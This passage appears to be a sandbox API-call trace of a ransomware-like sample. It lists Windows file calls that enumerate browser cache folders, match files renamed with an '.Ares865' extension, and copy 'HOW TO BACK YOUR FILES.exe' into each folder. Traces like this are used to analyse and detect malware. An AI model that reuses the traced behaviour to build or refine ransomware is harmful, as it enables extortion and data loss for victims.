ftCreationTime.dwLowDateTime=0xbded7090, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbded7090, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a77da80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1f80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgEH3[1].jpg.Ares865", cAlternateFileName="BBEGEH~1.ARE")) returned 1 [0110.926] lstrcmpiW (lpString1="BBEgEH3[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.926] lstrcmpiW (lpString1="BBEgEH3[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.926] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgEH3[1].jpg.Ares865" | out: lpString1="BBEgEH3[1].jpg.Ares865") returned="BBEgEH3[1].jpg.Ares865" [0110.926] lstrlenW (lpString="BBEgEH3[1].jpg.Ares865") returned 22 [0110.926] lstrlenW (lpString="Ares865") returned 7 [0110.926] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.926] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45725f30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45725f30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a77da80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgsz3[1].jpg.Ares865", cAlternateFileName="BBEGSZ~1.ARE")) returned 1 [0110.927] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgsz3[1].jpg.Ares865" | out: lpString1="BBEgsz3[1].jpg.Ares865") returned="BBEgsz3[1].jpg.Ares865" [0110.927] lstrlenW (lpString="BBEgsz3[1].jpg.Ares865") returned 22 [0110.927] lstrlenW (lpString="Ares865") returned 7 [0110.927] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.927] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4574c090, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4574c090, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a77da80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgTxB[1].jpg.Ares865", cAlternateFileName="BBEGTX~1.ARE")) returned 1 [0110.927] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgTxB[1].jpg.Ares865" | out: lpString1="BBEgTxB[1].jpg.Ares865") returned="BBEgTxB[1].jpg.Ares865" [0110.927] lstrlenW (lpString="BBEgTxB[1].jpg.Ares865") returned 22 [0110.927] lstrlenW (lpString="Ares865") returned 7 [0110.927] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.927] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45bc29d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45bc29d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7a3be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBo1lFJ[2].png.Ares865", cAlternateFileName="BBO1LF~1.ARE")) returned 1 [0110.927] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBo1lFJ[2].png.Ares865" | out: lpString1="BBo1lFJ[2].png.Ares865") returned="BBo1lFJ[2].png.Ares865" [0110.927] lstrlenW (lpString="BBo1lFJ[2].png.Ares865") returned 22 [0110.927] lstrlenW (lpString="Ares865") returned 7 [0110.927] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.927] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x455f5430, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x455f5430, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7a3be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBs47TE[1].png.Ares865", cAlternateFileName="BBS47T~1.ARE")) returned 1 [0110.927] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBs47TE[1].png.Ares865" | out: lpString1="BBs47TE[1].png.Ares865") returned="BBs47TE[1].png.Ares865" [0110.927] lstrlenW (lpString="BBs47TE[1].png.Ares865") returned 22 [0110.928] lstrlenW (lpString="Ares865") returned 7 [0110.928] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.928] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45987530, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45987530, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7a3be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2fb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBu9sWQ[1].jpg.Ares865", cAlternateFileName="BBU9SW~1.ARE")) returned 1 [0110.928] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBu9sWQ[1].jpg.Ares865" | out: lpString1="BBu9sWQ[1].jpg.Ares865") returned="BBu9sWQ[1].jpg.Ares865" [0110.928] lstrlenW (lpString="BBu9sWQ[1].jpg.Ares865") returned 22 [0110.928] lstrlenW (lpString="Ares865") returned 7 [0110.928] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.928] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45bc29d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45bc29d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a7a3be0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BByazif[2].jpg.Ares865", cAlternateFileName="BBYAZI~1.ARE")) returned 1 [0110.928] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BByazif[2].jpg.Ares865" | out: lpString1="BByazif[2].jpg.Ares865") returned="BByazif[2].jpg.Ares865" [0110.928] lstrlenW (lpString="BByazif[2].jpg.Ares865") returned 22 [0110.928] lstrlenW (lpString="Ares865") returned 7 [0110.928] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.928] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b51310, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b51310, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a7c9d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb220, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bs-components[1].css.Ares865", cAlternateFileName="BS-COM~1.ARE")) returned 1 [0110.928] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="bs-components[1].css.Ares865" | out: lpString1="bs-components[1].css.Ares865") returned="bs-components[1].css.Ares865" [0110.928] lstrlenW (lpString="bs-components[1].css.Ares865") returned 28 [0110.928] lstrlenW (lpString="Ares865") returned 7 [0110.928] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.928] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a7c9d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bs-util[1].css.Ares865", cAlternateFileName="BS-UTI~1.ARE")) returned 1 [0110.929] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="bs-util[1].css.Ares865" | out: lpString1="bs-util[1].css.Ares865") returned="bs-util[1].css.Ares865" [0110.929] lstrlenW (lpString="bs-util[1].css.Ares865") returned 22 [0110.929] lstrlenW (lpString="Ares865") returned 7 [0110.929] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.929] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd97bf10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbd97bf10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a816000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c7-bdbd0d-91cdfbc1[1].txt.Ares865", cAlternateFileName="C7-BDB~1.ARE")) returned 1 [0110.929] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" [0110.929] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" [0110.929] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.929] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\content.ie5\\abv8l7my\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.930] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.931] GetLastError () returned 0x0 [0110.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.931] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.931] CloseHandle (hObject=0x120) returned 1 [0110.931] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ae7bb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ae7bb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.932] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" [0110.932] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ" [0110.932] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.932] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.933] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.933] GetLastError () returned 0x0 [0110.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.933] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.934] CloseHandle (hObject=0x120) returned 1 [0110.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b5c5e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5c5e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.935] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing" [0110.935] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing" [0110.935] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.935] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\antiphishing\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.936] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.936] GetLastError () returned 0x0 [0110.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.936] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.936] CloseHandle (hObject=0x120) returned 1 [0110.936] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\AntiPhishing\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f10630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b5c5e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5c5e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.937] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word" [0110.937] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word" [0110.937] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.937] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.word\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.938] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.938] GetLastError () returned 0x0 [0110.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.938] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.938] CloseHandle (hObject=0x120) returned 1 [0110.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.Word\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe7138400, ftCreationTime.dwHighDateTime=0x1d2e625, ftLastAccessTime.dwLowDateTime=0x4d66d040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d66d040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.939] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO" [0110.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO" [0110.939] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.939] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.mso\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.940] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.940] GetLastError () returned 0x0 [0110.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.940] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.940] CloseHandle (hObject=0x120) returned 1 [0110.940] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.MSO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x2dbf3370, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.941] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5" [0110.941] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5" [0110.941] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.941] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.942] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.942] GetLastError () returned 0x0 [0110.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.942] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.942] CloseHandle (hObject=0x120) returned 1 [0110.942] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet 